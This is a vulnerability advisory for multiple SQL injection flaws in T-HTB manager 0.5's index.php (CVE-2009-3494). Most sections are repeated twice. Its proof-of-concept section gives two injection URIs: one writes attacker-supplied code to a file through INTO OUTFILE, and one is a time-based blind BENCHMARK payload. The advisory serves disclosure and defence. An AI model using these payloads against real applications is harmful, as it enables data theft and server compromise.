T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
BID:42968
Info
T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 42968 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3494 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2009 12:00AM |
| Updated: | Sep 10 2009 12:00AM |
| Credit: | Salvatore Fresta aka Drosophila |
| Vulnerable: |
T-HTB manager T-HTB manager 0.5 |
| Not Vulnerable: | |
Discussion
T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
T-HTB manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
T-HTB manager 0.5 is vulnerable; other versions may also be affected.
T-HTB manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
T-HTB manager 0.5 is vulnerable; other versions may also be affected.
Exploit / POC
T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTOOUTFILE '/tmp/file.php
http://www.example.com/path/index.php?action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTOOUTFILE '/tmp/file.php
http://www.example.com/path/index.php?action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23
Solution / Fix
T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
T-HTB manager 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- T-HTB manager Project Page (T-HTB manager)
- T-HTB Manager Mutiple Blind SQL Injection (Salvatore Fresta aka Drosophila
)